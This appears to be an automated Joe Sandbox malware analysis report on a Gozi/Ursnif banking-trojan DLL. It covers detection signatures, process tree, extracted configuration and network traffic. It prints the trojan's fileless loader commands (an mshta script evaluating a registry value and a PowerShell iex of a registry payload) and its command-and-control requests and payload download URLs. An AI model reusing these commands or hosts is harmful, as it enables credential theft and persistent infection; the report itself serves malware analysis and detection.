Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report onerous.tar.dll

Overview

General Information

Sample Name:onerous.tar.dll
Analysis ID:322295
MD5:79d81979dbbd1c8ceb04cc80a903ecd1
SHA1:f40959018e132fb1430f77a26903af222244676c
SHA256:5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
Tags:dll

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6780 cmdline: loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll' MD5: 76E2251D0E9772B9DA90208AD741A205)
    • control.exe (PID: 4672 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 7128 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4812 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6188 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4876 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3732 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5816 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5556 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4908 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5016 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3360 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "158", "system": "75b51dd63c757ef7e1ccbbde1d12750dhh%`", "size": "200775", "crc": "2", "action": "00000000", "id": "1100", "time": "1606281604", "user": "f73be0088695dc15e71ab15cb33c1faf", "hash": "0xa9e7194b", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 12 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5556, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', ProcessId: 4908
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5556
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5556, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', ProcessId: 4908

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: onerous.tar.dllAvira: detected
            Found malware configurationShow sources
            Source: loaddll32.exe.6780.0.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "158", "system": "75b51dd63c757ef7e1ccbbde1d12750dhh%`", "size": "200775", "crc": "2", "action": "00000000", "id": "1100", "time": "1606281604", "user": "f73be0088695dc15e71ab15cb33c1faf", "hash": "0xa9e7194b", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: c56.lepini.atVirustotal: Detection: 12%Perma Link
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: onerous.tar.dllVirustotal: Detection: 47%Perma Link
            Source: onerous.tar.dllReversingLabs: Detection: 58%
            Machine Learning detection for sampleShow sources
            Source: onerous.tar.dllJoe Sandbox ML: detected
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00458A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00458A61
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00443DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_00443DEE
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00456E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_00456E86
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00461C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_00461C05

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Found Tor onion addressShow sources
            Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmpString found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wfxlV_2BR_/2BKRWfbGdbKpccDlq/wjU_2FWdPQ1P/mnarl1yMJqa/qdhNVoh3oOz5bs/z60RqTSIuCKm6aR4446gj/CWuUplffN3IjYKGv/jAh08Sky_2BsVaS/mR26uhXrf_2FPOtRsi/kAWpATwOt/nHT1d49Zze7GI739MC4q/fqUVMDgzP8AWQSOV_2B/UYhCEI1zFK8E9H5v_0A_0D/bl8Ojy2x17tuP/HyuqS2KW/QxDOc9ASBROfBvf26kniC8O/wYs HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Nov 2020 20:19:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000021.00000000.419863199.000000000F589000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/ap=j%E/
            Source: ~DFCE3757A75A0E50D1.TMP.3.dr, {C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf
            Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/S
            Source: {E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.drString found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2B
            Source: {DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.drString found in binary or memory: http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM
            Source: {DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr, ~DFAC17D42899691A13.TMP.20.drString found in binary or memory: http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4Dr
